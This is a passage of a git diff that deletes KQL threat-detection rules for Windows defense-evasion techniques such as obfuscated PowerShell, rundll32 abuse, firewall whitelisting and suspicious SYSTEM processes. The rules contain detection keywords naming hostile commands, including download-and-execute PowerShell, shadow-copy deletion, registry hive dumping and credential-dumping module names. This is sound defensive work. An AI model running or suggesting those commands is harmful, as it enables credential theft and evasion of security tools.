-| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql b/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql
deleted file mode 100644
index 6b585da4..00000000
--- a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
-// Tags: attack.defense_evasion
-DeviceNetworkEvents
-| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql b/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql
deleted file mode 100644
index 9f1cde1d..00000000
--- a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/11
-// Level: high
-// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql b/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql
deleted file mode 100644
index 5bad9e78..00000000
--- a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
-// Date: 2019/04/08
-// Level: medium
-// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
-This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
-
-// Tags: attack.t1562.001, attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql b/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql
deleted file mode 100644
index 3d30e123..00000000
--- a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/06
-// Level: high
-// Description: Detect execution of suspicious double extension files in ParentCommandLine
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql
deleted file mode 100644
index 539f1c04..00000000
--- a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/21
-// Level: high
-// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql b/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql
deleted file mode 100644
index aeaaf597..00000000
--- a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/05
-// Level: medium
-// Description: Detects suspicious PowerShell invocation command parameters
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql b/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql
deleted file mode 100644
index c2209f70..00000000
--- a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index 317441d1..00000000
--- a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Process_Parents.kql b/Defense Evasion/Suspicious_Process_Parents.kql
deleted file mode 100644
index f2a0aaef..00000000
--- a/Defense Evasion/Suspicious_Process_Parents.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/21
-// Level: high
-// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Process_Start_Locations.kql b/Defense Evasion/Suspicious_Process_Start_Locations.kql
deleted file mode 100644
index 3bd09343..00000000
--- a/Defense Evasion/Suspicious_Process_Start_Locations.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4, Jonhnathan Ribeiro, oscd.community
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious process run from unusual locations
-// Tags: attack.defense_evasion, attack.t1036, car.2013-05-002
-DeviceProcessEvents
-| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql b/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql
deleted file mode 100644
index f47e40f1..00000000
--- a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2020/05/25
-// Level: high
-// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql b/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql
deleted file mode 100644
index 85a9b22b..00000000
--- a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/08
-// Level: high
-// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_RASdial_Activity.kql b/Defense Evasion/Suspicious_RASdial_Activity.kql
deleted file mode 100644
index 4e30f528..00000000
--- a/Defense Evasion/Suspicious_RASdial_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious process related to rasdial.exe
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where FolderPath endswith "rasdial.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Recursive_Takeown.kql b/Defense Evasion/Suspicious_Recursive_Takeown.kql
deleted file mode 100644
index 505ce3d4..00000000
--- a/Defense Evasion/Suspicious_Recursive_Takeown.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/30
-// Level: medium
-// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
-// Tags: attack.defense_evasion, attack.t1222.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql b/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql
deleted file mode 100644
index e5f98406..00000000
--- a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Eli Salem, Sander Wiebing, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql b/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql
deleted file mode 100644
index 57c97c53..00000000
--- a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/31
-// Level: high
-// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql
deleted file mode 100644
index 46923deb..00000000
--- a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: high
-// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql b/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql
deleted file mode 100644
index 100ed93b..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/05
-// Level: high
-// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql b/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql
deleted file mode 100644
index 2167b106..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Hieu Tran
-// Date: 2023/03/13
-// Level: high
-// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql b/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql
deleted file mode 100644
index 3d521133..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/05
-// Level: high
-// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql b/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql
deleted file mode 100644
index c3719d26..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Runscripthelper.exe.kql b/Defense Evasion/Suspicious_Runscripthelper.exe.kql
deleted file mode 100644
index 568eff5f..00000000
--- a/Defense Evasion/Suspicious_Runscripthelper.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of powershell scripts via Runscripthelper.exe
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql b/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program 